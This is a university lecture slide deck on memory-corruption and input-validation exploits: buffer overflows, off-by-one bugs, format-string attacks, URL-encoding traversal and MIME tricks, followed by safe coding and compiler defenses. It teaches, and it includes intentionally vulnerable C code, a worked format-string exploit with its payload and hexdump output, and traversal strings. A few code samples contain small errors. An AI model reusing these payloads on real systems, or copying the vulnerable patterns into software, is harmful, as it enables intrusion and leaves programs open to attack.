slides/15-exploits.html

<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
  <title>DADA: Exploits</title>
  <link rel="stylesheet" href="reveal.js/css/reveal.css">
  <link rel="stylesheet" href="reveal.js/css/theme/black.css">
  <link rel="stylesheet" href="dada.css">
  <!-- Theme used for syntax highlighting of code -->
  <link rel="stylesheet" href="reveal.js/lib/css/zenburn.css">
  <!-- Printing and PDF exports -->
  <script>
    var link = document.createElement( 'link' );
    link.rel = 'stylesheet';
    link.type = 'text/css';
    link.href = window.location.search.match( /print-pdf/gi ) ? 'css/print/pdf.css' : 'css/print/paper.css';
    document.getElementsByTagName( 'head' )[0].appendChild( link );
  </script>
</head>

<body>
  <div class="reveal">
    <div class="slides">

      <section data-markdown id="cover"><script type="text/template">
# CS 4630
&nbsp;
### Defense Against the Dark Arts
&nbsp;
<center><small>[Aaron Bloomfield](http://www.cs.virginia.edu/~asb) / [aaron@virginia.edu](mailto:aaron@virginia.edu) / [@bloomfieldaaron](http://twitter.com/bloomfieldaaron)</small></center>
<center><small>Repository: [github.com/aaronbloomfield/dada](http://github.com/aaronbloomfield/dada) / [&uarr;](index.html) / <a href="?print-pdf"><img class="print" width="20" src="images/print-icon.png"></a></small></center>
&nbsp;  
&nbsp;
## Exploits
  </script></section>

	<section data-markdown><textarea data-template>
# Contents
&nbsp;  
[1st Generation Exploits](#/firstgen)  
[2nd Generation Exploits](#/secondgen)  
[3rd Generation Exploits](#/thirdgen)  
[Miscellaneous Vulnterabilities](#/miscvul)  
[Safe and Unsafe Coding](#/safeandunsafe)  
[Defenses](#/defenses)  
	</textarea></section>

	<section>
      
	  <section data-markdown id="firstgen"><textarea data-template>
# 1st Generation Exploits
	  </textarea></section>
	  
	  <section data-markdown data-separator="^\n$"><textarea data-template>
## Vulnerabilities and Exploits
- *Vulnerability* is often used to refer only to vulnerable code in an OS or applications
- More generally, a vulnerability is whatever weakness in an overall system makes it open to attack
- An attack that was designed to target a known vulnerability is an *exploit* of that vulnerability


## Varieties of Vulnerabilities
- Buffer overflow on stack
  - Primarily used to overwrite the return address
- Buffer overflow on heap
  - Return addresses are not on the heap
  - Other pointers are on the heap and can be overwritten, e.g. function & file pointers
- Format string attacks
- Memory management attacks
- Failure to validate input
- URL encoding failures; ... the list goes on


## Classifying Vulnerabilities
- Szor classifies vulnerabilities and exploits by generation
- First generation: Stack buffer overflow
- Second generation:
	- Off by one overflows, heap overflows, file pointer overwriting, function pointer overwriting
- Third generation
	- Format string attacks, memory (heap) management attacks
	- ... the list is lengthy


## First Generation Exploits
- *Buffer overflow* is the most common exploit
  - Array bounds not usually checked at run time
- What comes *after* the buffer being overflowed determines what can be attacked
	- The return address is on the stack at a known offset after the last local variable
	- Return address can be changed to cause a return to malicious code
- Buffer overflows are easy to guard against, yet they remain the most common code vulnerability


## Stack Buffer Overflow Example
```
void bogus(void) {
   int i;
   char buffer[256];      // Return address follows!

   printf("Enter your data as a string.\n");
   scanf("%s", buffer);       // No bounds check!

   process_data(buffer);
   return;
   // Returns to the return address that follows 
   // buffer[] on the stack frame
}
```


## Stack Buffer Overflow cont'd
<!-- .slide: class="right-float-img-1000" -->
![stack diagram](images/exploits/stack-buffer-overflow-1.png)
In the stack frame for `bogus()`, the return address is right above the saved frame pointer, which is right above `buffer[260]`

In the 64-bit calling convention, there (usually) is no saved frame pointer


## Stack Buffer Overflow cont'd.
- Notice that the program does not check to make sure that the user inputs 255 characters or less
- Source code is available for many operating systems and applications (or, they can be reverse engineered)
- Attacker can see that it is possible to overflow the buffer
- Buffer is last data item on the stack frame; the return address from this function will be at a defined distance after it


## Stack Buffer Overflow cont'd.
- Attacker can enter a character string representation of his malicious object code, long enough to fill the buffer
- At the end of the malicious code, the attacker passes the address of variable "buffer" so that it overwrites the return address of function `bogus()` on the stack frame
- When `bogus()` returns, it will cause a return to the buffer address, executing the malicious code in it


## Stack Buffer Overflow cont'd.
<!-- .slide: class="right-float-img-1000" -->
![stack diagram](images/exploits/stack-buffer-overflow-2.png)
`bogus()` is now "returning" to `buffer[0]`
	  </textarea></section>

	</section>
      
	<section>
      
	  <section data-markdown id="secondgen"><textarea data-template>
# 2nd Generation Exploits
	  </textarea></section>
	  
	  <section data-markdown data-separator="^\n$"><textarea data-template>
## Heap Buffer Overflow
- Example: overwriting a file pointer
```
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(int argc, char **argv) {
    int ch = 0, i = 0;
    FILE *f = NULL;
    static char buffer[16], *szFileName = "C:\\harmless.txt";
    ch = getchar();
    while (ch != EOF) /* User input can overflow buffer[] */
      buffer[i++] = ch;  ch = getchar();
    f = fopen(szFileName, "w+b"); /* might be modified! */
    fputs(buffer, f);
    fclose(f);
    return 0;
}
```


## Heap Buffer Overflow
- Examine the key lines of the example code:
```
static char buffer[16], *szFilename =
                   "C:\\harmless.txt";
```
- Both variables are placed in global heap (because they are static) and will be consecutive in the heap
- When `buffer[]` is overflowed with keyboard input, it will overwrite `szFilename`:
```
while (ch != EOF) { // User input can overflow buffer
    buffer[i++] = ch;
	ch = getchar();
}
```


## Heap Buffer Overflow
- An attacker who can compile the code and dump it to figure out addresses can now make `szFileName` point anywhere he wants
- For example, he could make it point to `argv[1]`; this means he can pass in a file name on the command line!
- So, the attacker passes in `C:\autoexec.bat` or some other protected system file name on the command line; if this program is a system utility that runs with admin privileges, the system file can be overwritten


## Off by One Attack
- The C language starts array indices at zero, which is not always intuitive for beginning programmers
- This often leads to off-by-one errors in code that fills a buffer
```
void vuln(char *foobar) {
    int i;
    char buffer[512];
    for (i = 0; i <= 512; ++i) // Should be <, not <=
      buffer[i] = foobar[i];
}
int main(int argc, char *argv[]) {
    if (2 == argc)
      vuln(argv[1]);
    return 0;
}
```


## Off by One Attack
- How much damage could a one-byte exploit cause?
- The return address is NOT located just past the local variables on the x86 stack frame
  - There is a saved EBP location between them (the frame pointer)
- The attacker cannot directly alter the return address
- S/he *can* alter the last byte of the saved EBP


## Off by One Attack
- When the vulnerable function returns, the calling function will now have a bogus stack frame
  - This bogus stack frame can be arranged to lie within the buffer that was partly filled with malicious code
  - When the caller of the vulnerable function returns, it will return into the start of the malicious code section of the buffer


## Off by One Stack Frame
- The caller of the vulnerable function ends up returning to a fake return address (inside buffer):
  - 512 bytes of `buffer[]` received malicious code, plus a bogus stack frame, from the keyboard, as hex strings
  - Byte 513 from the keyboard was the new lowest byte of the valid saved EBP
	- Lowest because the x86 is little-Endian
	- Thus making the caller's stack frame be inside `buffer[]`


## Off by One Stack Frame
<!-- .slide: class="max-image-height-500" -->
![off by one attack](images/exploits/off-by-one.png)


## Off by One: Real Examples
- [Nestea IP frame off-by-one denial of service attack](http://www.insecure.org/sploits/linux.PalmOS.nestea.html)
- [Linux fileutils "ls" command off-by-one memory exhaustion attack (system crashes)](http://www.linuxsecurity.com/content/view/105485/105/)  (registration required)
- [Middleman printer proxy server Linux attack](http://www.linuxdevcenter.com/pub/a/linux/2003/01/13/insecurities.html#mid)


## Function Pointer Overwriting
- A system utility could have a function pointer to a callback function, declared after a buffer (Szor, Listing 10.5)
- Overflowing the buffer overwrites the function pointer
- By determining the address of system() on this machine, an attacker can cause system() to be called instead of the callback function
- [Macromedia Flash example](http://www.securiteam.com/windowsntfocus/6W00J00EKQ.html)
	  </textarea></section>

	</section>
      
	<section>
      
	  <section data-markdown id="thirdgen"><textarea data-template>
# 3rd Generation Exploits
	  </textarea></section>
	  
	  <section data-markdown data-separator="^\n$"><textarea data-template>
## Format String Attacks
- Many C library functions produce formatted output using format strings
  - e.g. `printf()`, `fprintf()`, `wprintf()`, `sprintf()`, etc.)
- These functions permit strings that have no format control to be printed (unfortunately):
```
char buffer[13] = "Hello, world!";
printf(buffer);        /* Bad programmer! */
printf("%s", buffer);  /* Good programmer! */
```


## Format String Attacks
- Consdier:
```
char buffer[13] = "Hello, world!";
printf(buffer);        /* Bad programmer! */
```
- The format string (1st parameter to `printf()`) is not a fixed string
- This non-standard approach creates the possibility that an attacker will pass a format string rather than a string to print, which can be used to write to memory


## Format String Attack Example
Source code: [vuln.c](code/exploits/vuln.c) ([html](code/exploits/vuln.c.html))
```
void vuln(char buffer[256]) {
  printf(buffer); 
  /* Bad; good would be: printf("%s",buffer) */
}
int main(int argc, char *argv[]) {
   char buffer[256] = "";  /* allocate buffer */
   if (2 == argc)  /* copy command line */
      strncpy(buffer, argv[1], 255);
   vuln(buffer);
   return 0;
}
```
- The included [Makefile](code/exploits/Makefile) compiles this to `vuln-32bit.exe` and `vuln-64bit.exe`
- What if the user passes `%x` on the command line?


## Format String Attack Example
- For sanity sake, we will probably want to run it via:
```
setarch x86_64 -v -LR vuln-32bit.exe
setarch x86_64 -v -LR vuln-64bit.exe
```
- This isn't necessary, but it will make our lives easier
  - Since the addresses will be the same each time we run it
- And when run on the Ubuntu 16.04 VirtualBox image, your execution will match the examples in this slide set


## Format String Attack Example
- If the user passes `%x` on the command line, then printf() will receive a pointer to a string with `"%x"` in it on the stack
- `printf()` will see the `%x` and assume there is another parameter above it on the stack
- Whatever is above it on the stack will be printed in hexadecimal
- Difference between correct and incorrect uses of `printf()` is seen in next diagram


## Example: Uses of printf()
- Immediately after the call to `printf()`, but before the prologue code in `printf()`:
![format string attack](images/exploits/format-string-attack-1.png)
- This is the 32-bit version


## Example: Uses of printf()
- For the 64-bit version:
  - The return addresses are still on the stack
	- 0x4005f3 from `printf()` to `vuln()`
	- 0x40067c from `vuln()` to `main()`
  - The parameters are in registers (rdi for the first, rsi for the second, etc.)
- Note that, in both cases, there may be other values between the stack values shown


## Format String Attack Example
- In the bad code, whatever is above `%x` on the stack will be printed in hexadecimal
  - Attacker can use `%x%x%x`, etc., to display the stack contents and figure out return addresses
- An attacker who can use an interactive utility can determine the exact address where his malicious code will be placed, where the return address is, and therefore what value to use to overwrite the return address


## Positioning Within the Stack
- If an attacker wants to skip over 32 bytes in the stack, he can supply 8 `%x` fields in the format string on the command line:
```
vuln-32bit.exe %x%x%x%x%x%x%x%x%s
vuln-64bit.exe %x%x%x%x%x%x%x%x%s
```
- The format string causes 8 ints to be printed off the stack in hex, using the `%x` specifiers, then prints a string (using `%s`) starting at the next stack position


## Positioning Within the Stack
- Some better formatting tips:
  - One can use `%.8x` to ensure all values are printed with 8 digits
  - Or `%.16lx` for the 64-bit version
  - And put commas between
- To print 6 hex values:
```
vuln-32bit.exe %.8x,%.8x,%.8x,%.8x,%.8x,%.8x
vuln-64bit.exe %.16lx,%.16lx,%.16lx,%.16lx,%.16lx,%.16lx
```


## Overwriting Within the Stack
- The format string can also be used to force `printf()` to write to memory via `%n`:
```
printf("foobar%n", &nBytesWritten);
```
  - This prints "foobar", writes 6 to `nBytesWritten`
  - We can also use `%hn` for a short, or `%ln` for a long
- Attacker can supply address to write to:
```
vuln-32bit.exe 0x12FE7C%x%x%n
```
  - We'll see how this works next...


## A vulnerability
Consider the [exploitable.c](code/exploits/exploitable.c) ([html](code/exploits/exploitable.c.html)) code:
```
int exploited() {
  printf("Got here!\n");
  exit(0);
}
  
int main(void) {
  char buffer[100];
  while (fgets(buffer, sizeof buffer, stdin)) {
    printf(buffer);
  }
  return 0;
}
```
- Can we supply a string such that `exploited()` will be called?


## Where are we going?  And why are we in this handbasket?
- First, we need to get the address of `fgets()` and also `exploited()`
  - We want to change a fall to `fgets()` to be a call to `exploited()`
- We can get that through `objdump`


## `objdump -d exploitable.exe`
<pre class="code">
exploitable.exe:     file format elf64-x86-64
  
Disassembly of section .init:
...
0000000000400580 < fgets@plt >:
  400580:	ff 25 b2 0a 20 00    	jmpq   *0x200ab2(%rip)        # <span class='red'>601038</span> <_GLOBAL_OFFSET_TABLE_+0x38>
  400586:	68 04 00 00 00       	pushq  $0x4
  40058b:	e9 a0 ff ff ff       	jmpq   400530 <_init+0x20>
  
0000000000<span class='red'>4006a6</span> < exploited >:
  4006a6:	55                   	push   %rbp
...
</pre>

- The address of `exploited()` is 0x4006a6
- The address of the pointer to `fgets()` is 0x601038
  - Scroll the code window to the right to see this


## A bit more background
- `exploited()` address 0x4006a6 is 4,196,006 in decimal
- Recall that parameter 1 will be in rdi, and it will be a pointer to the buffer
- 1 character specifiers, such as `%c`, still "read" in 8 bytes on the stack, but print out one character


## Faking printf() parameters
![format string attack](images/exploits/format-string-attack-2.png)


## Creating the exploit
- The goal:
  - Have 5 specifiers to "burn" the values in the registers
  - Generate the address for `exploited()` by printing 0x4006a6 = 4,196,006 bytes to stdout (!)
  - Overwrite the `fgets()` address by writing that value to the address of 0x601038
- Our format string will contain:
  - A whole bunch of specifiers
  - The address, in hex, of `fgets()`: 0x601038


## Parts of the puzzle
- To "burn" the five registers registers, we'll print them as characters:
```
%c%c%c%c%c
```
- To print many characters, we'll use an unsigned int specifier with a large number of digits
```
%.4196006u
```
  - (that number will change slightly)
  - Once we've printed out 4 Mb of characters, we can write that number as a pointer to memory


## The result
<pre class="code">
<span class="springgreen">%c%c%c%c%c</span><span class="darkkhaki">%c%c%c</span><span class="coral">%.4195998u</span><span class="darkgray">%ln</span><span class="lightskyblue">???</span><span class="palevioletred">0x601038</span>
</pre>
- <span class="springgreen">%c%c%c%c%c</span> "burns" the registers
- <span class="darkkhaki">%c%c%c</span> moves forward 3 "spots" (24 bytes)
- <span class="coral">%.4195998u</span> writes most of the 4 Mb of characters
- <span class="darkgray">%ln</span> writes the value to memory
- <span class="lightskyblue">???</span> aligns the text so far to 32 bytes
- <span class="palevioletred">0x601038</span> is the address to write to
	- It's provided as binary, not the text shown


## Analysis
<pre class="code">
<span class="springgreen">%c%c%c%c%c</span><span class="darkkhaki">%c%c%c</span><span class="coral">%.4195998u</span><span class="darkgray">%ln</span><span class="lightskyblue">???</span><span class="palevioletred">0x601038</span>
</pre>
- Total bytes written to stdout:
  - 5 from <span class="springgreen">%c%c%c%c%c</span>
  - 3 from <span class="darkkhaki">%c%c%c</span>
  - 4,195,998 from <span class="coral">%.4195998u</span>
- Total is 4,196,006
  - In hex, that's 0x4006a6
- This is the value written by <span class="darkgray">%ln</span> as a 8-byte value
  - Since <span class="darkgray">%ln</span> writes as a `long`


## Analysis
<pre class="code">
<span class="springgreen">%c%c%c%c%c</span><span class="darkkhaki">%c%c%c</span><span class="coral">%.4195998u</span><span class="darkgray">%ln</span><span class="lightskyblue">???</span><span class="palevioletred">0x601038</span>
</pre>
- How does <span class="darkgray">%ln</span> get the address?
- `printf()` sees 4 "values" on the stack (after burning the registers):
  - The 1st <span class="darkkhaki">%c</span> reads the first 8 bytes: <span class="springgreen">%c%c%c%c</span>
  - The 2nd <span class="darkkhaki">%c</span> reads the next 8 bytes: <span class="springgreen">%c</span><span class="darkkhaki">%c%c%c</span>
  - The 3rd <span class="darkkhaki">%c</span> reads the next 8 bytes: <span class="coral">%.419599</span>
  - The <span class="coral">%.4195998u</span> reads the next 8 bytes: <span class="coral">8u</span><span class="darkgray">%ln</span><span class="lightskyblue">???</span> (and interprets it as an unsigned)
- Thus, when it's time to find the address for <span class="darkgray">%ln</span>, what is read is <span class="palevioletred">0x601038</span>


## The result
Consider the [attack.c](code/exploits/attack.c) ([html](code/exploits/attack.c.html)) code:
```
#include <stdio.h>
int main() {
  /* advance through 5 registers, then 4 * 8 = 32 bytes
   * down stack, outputting 4195998 + 8 characters 
   * before using %ln to store a long. Then pad that
   * to 32 bytes of text. */
  fputs("%c%c%c%c%c%c%c%c%.4195998u%ln???", stdout);
  /* write pointer value, which will include \0s */
  void *ptr = (void*) 0x601038;
  fwrite(&ptr, 1, sizeof(ptr), stdout);
  fputs("\n", stdout);
  return 0;
}
```
- Note that we have to use `fwrite()`, since we are writing binary data


## Output analysis
<pre class="codesmall">
$ ./exploitable.exe < attack.out  > exploitable.out
$ hexdump -C exploitable.out
00000000  39 90 0a 39 38 25 25 25  30 30 30 30 30 30 30 30  |9..98%%%00000000|
00000010  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30  |0000000000000000|
*
00400690  30 30 30 30 30 30 30 30  30 30 30 30 31 38 31 34  |0000000000001814|
004006a0  33 39 34 31 36 38 3f 3f  3f 38 10 60 47 6f 74 20  |394168???8.`Got |
004006b0  68 65 72 65 21 0a                                 |here!.|
004006b6
$
</pre>
- The first 5 bytes are the parameter registers as chars
- The next three bytes is the format string as chars
- The next 4,195,998 bytes are the end of the format string interpreted as an unsigned
  - The value is 1,814,394,168, with a *lot* of leading 0's
  - Note that hexdump removes most of the 0's from this output display


## Output analysis
<pre class="codesmall">
$ ./exploitable.exe < attack.out  > exploitable.out
$ hexdump -C exploitable.out
00000000  39 90 0a 39 38 25 25 25  30 30 30 30 30 30 30 30  |9..98%%%00000000|
00000010  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30  |0000000000000000|
*
00400690  30 30 30 30 30 30 30 30  30 30 30 30 31 38 31 34  |0000000000001814|
004006a0  33 39 34 31 36 38 3f 3f  3f 38 10 60 47 6f 74 20  |394168???8.`Got |
004006b0  68 65 72 65 21 0a                                 |here!.|
004006b6
$
</pre>
- The next three ?'s are the padding from the source code
- The address, in binary, is printed next, as 3 characters (0x601038)
- The end of the input is the "Got here\n" from the `exploited()` function


## Writing an Arbitrary Value
- Some modern C libraries do not permit huge width specifiers, so 0x601038 cannot always be written using a single `%n` field
  - An attacker can work around this defense by writing 0x601038 as three separate bytes: 0x60, 0x10, and 0x38, to three consecutive byte locations that overwrite the old return address, using three `%n` fields on the command line
- Only works on a machine such as the x86 that permits unaligned byte stores to memory


## Example
- We want to:
  - Write 1000 (short) (equals 0x3e8) to address 0x1234567890ABCDEF
  - Write 2000 (short) (equals 0x7d0) to address 0x1234567890ABCDF1
  - We "know" that the buffer starts 16 bytes above `printf()` return address
- The result:
<pre class="code">
<span class="springgreen">%c%c%c%c%c</span><span class="darkkhaki">%c%c%c%c%.991u</span><span class="coral">%hn</span><span class="darkgray">%.1000u</span><span class="lightskyblue">%hn</span>
</pre>


## Example
<pre class="code">
<span class="springgreen">%c%c%c%c%c</span><span class="darkkhaki">%c%c%c%c%.991u</span><span class="coral">%hn</span><span class="darkgray">%.1000u</span><span class="lightskyblue">%hn</span>
</pre>
- <span class="springgreen">%c%c%c%c%c</span>: skip over registers
- <span class="darkkhaki">%c%c%c%c%.991u</span>: skip to format string buffer, past format part
  - 9 + 991 chars is 1000
- <span class="coral">%hn</span>: write to first pointer
- <span class="darkgray">%.1000u</span>: 1000 + 1000 = 2000
- <span class="lightskyblue">%hn</span>: write to second pointer
- (note that we haven't showed the rest of the format string, which would contain the addresses for the two <span class="coral">%hn</span> specifiers)


## Heap Management
- A heap allocation (e.g. via `malloc()`) allocates a small control block, with pointer and size fields, just before the memory that is allocated
- An attacker can underflow the heap memory allocated (in the absence of proper bounds checking, or with pointer arithmetic) and overwrite the control block
- The heap management software will now use the overwritten memory pointer info in the control block, and can thus be redirected to write to arbitrary memory addresses


## Input Validation Failures
- There are numerous ways in which an application program can fail to validate user input
- We will examine the two failures that are most important in the Internet age:
	- URL encoding and canonicalization
	- MIME header parsing


## URL Encoding and Canonicalization
- The following URLs represent the same image file:
  - http://domain.tld/user/foo.gif
  - http://domain.tld/user/bar/../foo.gif
- Canonicalization converts URLs into a standard form
  - The 2nd URL above would be converted to the 1st
- Szor, p. 385: "A URL canonicalization vulnerability occurs when a security decision is based on a URL and not all of the URL representations are taken into account."


## URL Encoding and Canonicalization
- Suppose a web server only allows external access to the /user subdirectories, but does not canonicalize URLs before checking them:
  - http://domain.tld/user/index.html         (legal)
  - http://domain.tld/passwords.txt           (illegal)
  - http://domain.tld/user/../passwords.txt   (canonicalization exploit)
- After many such exploits, server software began searching for ".." and converting URLs to canonical form
- However, character encoding permitted canonicalization exploits to continue


## URL Character Encoding
- Most web servers support UTF-8 charset encoding; e.g. `%2F` represents a forward slash
- Encoding rules:
  -  0- 7 bits input xxxxxxx  becomes 0xxxxxxx
  -  8-11 bits input xxxxxxxxxxx becomes 110xxxxx 10xxxxxx
  - 12-16 bits input xxxx...xxxx becomes 1110xxxx 10xxxxxx 10xxxxxx
  - 17-21 bits input xxxx...xxxxx becomes 11110xxx 10xxxxxx (2x more)


## URL Character Encoding
- It is easy enough for the server to spot `%2F` and recognize a forward slash, but `%2F` can be encoded via the 8-11 bits format as `%C0%AF`:
  - http://domain.tld/user/..%C0%AFpasswords.txt
  - No longer looks like ../ is present, but it is!


## URL Character Encoding cont.
- Simple encoding problem was easily fixed in web servers, but multilevel encoding is possible:
  - `%255c` is not recognized as a backslash by the security checker.
  - After one round of decoding, %255c becomes %5c, because %25 is a code for the percent sign itself: %25 ? %
-  The result, %5c, would be flagged as a backslash by the security checker if it had been present initially; it was only searching for '%5c' or '\'


## URL Character Encoding cont.
-  One more round of decoding will be invoked by the server, because it sees the % sign, and `%5c` will become a backslash (useful in Windows path names); 
- after the encoding exploit has passed the security checker, the web page server will serve the page (unfortunately!)


## URL Character Encoding cont.
- Web servers such as Microsoft IIS have been patched to fix this vulnerability
- Before the patch, the [W32/Nimda](https://www.symantec.com/security_response/writeup.jsp?docid=2001-091816-3508-99) worm used this trick to backtrack into the root directory and use cmd.exe to copy itself over the web to the server and execute itself.


## MIME Header Parsing
- An email can have embedded or attached MIME files
- Outlook and other email clients often use Internet Explorer to parse the MIME files
- A MIME file type can be associated with an application and passed automatically to it, e.g. audio/x-wav files can be associated in Windows with Windows Media Player, so such a file would be sent by Internet Explorer directly to its associated application


## MIME Header Parsing 
- Vulnerability: Internet Explorer (before being fixed; see [here](http://www.microsoft.com/technet/security/bulletin/MS01-020.mspx)) would determine that the attachment should be opened automatically by an application, but would then allow the file extension to take priority in determining what application to use


## MIME Header Parsing 
- Exploit: Make an attachment of MIME type audio/x-wav but make the file name be virus.exe. 
	- The MIME type causes Internet Explorer to make the decision to open it automatically (even though the Outlook email client might have settings that should prevent opening *.exe files). 
	- Then, the *.exe extension causes Internet Explorer to pass it to the OS to execute.
- Vulnerability fixed in 2001 (IE 5.x).
	- Not before [W32/Badtrans](https://www.symantec.com/security_response/writeup.jsp?docid=2001-112410-5327-99) and [W32/Klez](https://www.symantec.com/security_response/writeup.jsp?docid=2002-041714-3225-99) could exploit it.
	  </textarea></section>

	</section>
      
	<section>
      
	  <section data-markdown id="miscvul"><textarea data-template>
# Miscellaneous Vulnerabilities
	  </textarea></section>
	  
	  <section data-markdown data-separator="^\n$"><textarea data-template>
## Miscellaneous Vulnerabilities
- Mistakes by system administrators, users, bad default security levels in applications software or firewalls, etc., can all create vulnerabilities
- Most exploits (including all 3 generations) are referred to as *blended attacks*
  - Because there is always a mixture of an exploit and a particular type of malicious code
  - e.g. overflowing a buffer is an exploit, but depositing a virus and running it is the second stage of the blended attack
- We will review some non source code examples


## System Administration Vulnerabilities
- Failure to provide secure utilities
	- e.g. SSL/SSH remote login utilities were not commonly used a decade ago
- Loose file system access rights and user privilege levels
	- many users have no idea that everyone can read many of their files
	- or the 4th octal digit of chmod permissions


## System Administration Vulnerabilities
- Errors in firewall configuration (Szor, sec. 14.3)
	- Allows attackers unauthorized access
	- Permits denial of service attacks to continue instead of excluding the flood of packets


## User Behavior Vulnerabilities
- Poor password selection
  - Too short; all alphabetic; common words
  - 1988 Morris worm used a list of only 432 common passwords, and succeeded in cracking many user accounts all over the internet
  - This was the main reason the worm spread more than the creator thought it would; he did not realize that password selection was that bad!
- Opening executable email attachments


## Vulnerabilities: Do We Ever Learn?
- All of these vulnerabilities have been known for years -- buffer overflows for over 40 years!
- Yet, the number of exploits is increasing
	- 323 buffer overflow vulnerabilities reported in 2004 to the national cyber-security vulnerability database (http://nvd.nist.gov/)
	- 331 buffer overflow vulnerabilities reported in just the first 6 months of 2005!
	- They don't bother to keep track anymore...


## Avoiding Vulnerabilities
- Good password selection
	- Many newer systems even allow pass phrases, i.e. multiple words with punctuation or blanks between
	- System should try its own dictionary attack and not permit you to choose a password that can be defeated
- Don't store a password unencrypted anywhere in a system, even in a temporary variable in a program


## Avoiding Vulnerabilities
- Don't open executable email attachments
- Review access permissions throughout your file directory structure
- Display and review your firewall settings
	  </textarea></section>

	</section>
      
	<section>
      
	  <section data-markdown id="safeandunsafe"><textarea data-template>
# Safe and Unsafe Coding
	  </textarea></section>
	  
	  <section data-markdown data-separator="^\n$"><textarea data-template>
## Avoiding Vulnerabilities
- Good coding style
  - Use only the good form of `printf()`; never use `printf(buffer)` for any function in the `printf()` family
  - Review loop bounds for off-by-one errors
  - Avoid unsafe C functions (e.g. `strcpy()`, `strcat()`, `sprintf()`, `gets()`, `scanf()`) and learn how to use alternatives (e.g. `strncpy()`, `strncat()`, `snprintf()`)
  - Insert bounds checking code


## Avoiding Vulnerabilities
- Good coding style, continued
  - Avoid unsafe programming languages (C, C++) and use more modern, safe languages wherever possible (Java, Ada, C# in managed mode)
- We will look at some coding style pointers from [Building Secure Software](https://www.amazon.com/Building-Secure-Software-Addison-Wesley-Professional/dp/0321774957) by Viega and McGraw


## Safe and Unsafe Coding
- Unsafe:
```
void main() {
    char buf[1024];
    gets(buf);  /* Won't stop at 1024 bytes */
}
```
- Safe:
```
#define BUFSIZE 1024
void main() {
    char buf[BUFSIZE];
    fgets(buf, BUFSIZE, stdin);
}
```


## Safe and Unsafe Coding
- Unsafe:
```
strcpy(dst, src);  /* What prevents buffer overflow? */
```
- Safe:
```
#define DSTSIZE 1024
char dst[DSTSIZE];
:
:
/* Leave room for null terminator: */
strncpy(dst, src, DSTSIZE - 1);
/* Null terminate the string: */
dst[DSTSIZE - 1] = `\0';
```


## Safe and Unsafe Coding
- Unsafe:
```
strcpy(dst, src);  /* What prevents buffer overflow? */
```
- Safe:
```
/* Another way to fix the problem: */
dst = (char *) malloc(strlen(src) + 1);
if (NULL == dst) {
   /* handle error here, abort */
}
strcpy(dst, src); 
```


## Safe and Unsafe Coding
- Unsafe:
```
strcat(dst, src);
/* Enough room left in dst to concatenate src? */
```
- Safe:
```
strncat(dst, src, DSTSIZE - strlen(dst) - 1); 
```


## Safe and Unsafe Coding
- Unsafe:
```
int main(int argc, char *argv[]) {
    char usage[1024];
      /* Big enough for a valid file name ... right? */
    sprintf(usage, "USAGE: %s -f flag [arg1]\n", argv[0]);
    return 0;
}
```
- Safe:
```
int main(int argc, char *argv[]) {
    char usage[1024];
    char format_string = "USAGE: %s -f flag [arg1]\n";
    snprintf(usage, 1024, format_string, argv[0]);
    return 0;
}
```


## Safe and Unsafe Coding: sprintf()
- Vulnerability:
```
int main(int argc, char *argv[]) {
    char usage[1024];  /* Can this be overflowed? */
    sprintf(usage, "USAGE: %s -f flag [arg1]\n", argv[0]);
    // How long can a filename be, in argv[0]? What if the
    // filename is not a legitimate name from the OS? See
    // exploit below.
    return 0;
}
```


## Safe and Unsafe Coding: sprintf()
- Exploit:
```
int main(int argc, char *argv[]) {
    execl("/path/to/above/program", 
		  [very long string here],
		  NULL);
    // Starts program in 1st arg, passes 2nd arg
	// as argv[0] to that program. Bad news!
    return 0;
}
```


## Safe and Unsafe Coding: sprintf()
- Problem: `snprintf()` is not part of all C libraries
- Solutions:
  - Package a working `snprintf()` with your software
  - Use a width limit specifier in sprintf():
```
sprintf(usage, "USAGE: %.1000s -f flag [arg1]\n",
        argv[0]);
```
- Unfortunately, the width limit specifier `%.1000s` is not standard across all libraries, either


## Safe and Unsafe Coding
- Unsafe:
```
void main(int argc, char *argv[]) {
    char buf[256];
    sscanf(argv[0], "%s", &buf);  // Won't stop at 256 bytes
}
```
- Safe:
```
void main(int argc, char *argv[]) {
    char buf[256];
    sscanf(argv[0], "%255s", &buf); // Width limit specifier
}
```


## Safe and Unsafe Coding
- Each of the example applies to a family of library functions
- For example, `scanf()`, `sscanf()`, `fscanf()`, and `vfscanf()` all have the same coding vulnerabilities
- The safe style shown in our examples can be easily adapted to other members of the same family
	  </textarea></section>

	</section>
      
	<section>
      
	  <section data-markdown id="defenses"><textarea data-template>
# Defenses
	  </textarea></section>
	  
	  <section data-markdown data-separator="^\n$"><textarea data-template>
## Compiler-Based Prevention
- One approach: Modify the C language itself with a new compiler and runtime library, as in the [Cyclone variant of C](http://www.research.att.com/projects/cyclone/)
  - Overhead for bounds checking, garbage collection, library safeguards, etc., ranges from negligible to >100% for the worst cases
- Another approach: leave the language alone, but modify the compiler to emit stack and/or buffer overflow safeguards in the executable
	- Examples we will see: StackGuard, ProPolice, and StackShield


## StackGuard: Stack Canaries
- StackGuard inserts a marker in between the frame pointer and the return address on the stack
	- Marker is called a `canary`, as in the "canary in a coal mine"
- If a buffer overflow overwrites the stack all the way to the return address, it will also overwrite the canary
- Before returning, the canary is examined for modification


## Stack Canary Operation
<!-- .slide: class="max-image-height-300" -->
![canary stack](images/exploits/canary-stack.png)
- Overflowing `buffer[]` tramples on canary
- Does not prevent trashing the EBP, local function or file pointers, etc.
- Canary value: NUL-CR-LF-EOF; very difficult to write out from a string


## ProPolice: Better Stack Canaries and Frame Layout
- ProPolice (a.k.a. SSP, Stack-Smashing Protector) from IBM makes a couple of major improvements to StackGuard
	- Canary is placed below the saved EBP to protect it
	- The stack frame layout is rearranged so that non-array locals, such as function pointers and file pointers, are placed below arrays, so that overflowing the arrays cannot reach the pointers


## Stack Canary Limitations
- Stack canaries only guard against a *direct* attack on the stack, e.g. overwriting a portion of the stack directly from its neighboring addresses
- We saw that a format-string attack is *indirect*: it computes the location of the return address, then overwrites just that address and does not overflow from neighboring addresses
	- Hence, it does not overwrite a canary


## StackShield: Protecting Return Addresses
- StackShield is a Linux/gcc add-on that modifies the ASM output from gcc to maintain a separate data segment with return addresses
- Removing the return addresses from the data stack prevents both direct and indirect data attacks on the return address


## StackShield: Protecting Return Addresses
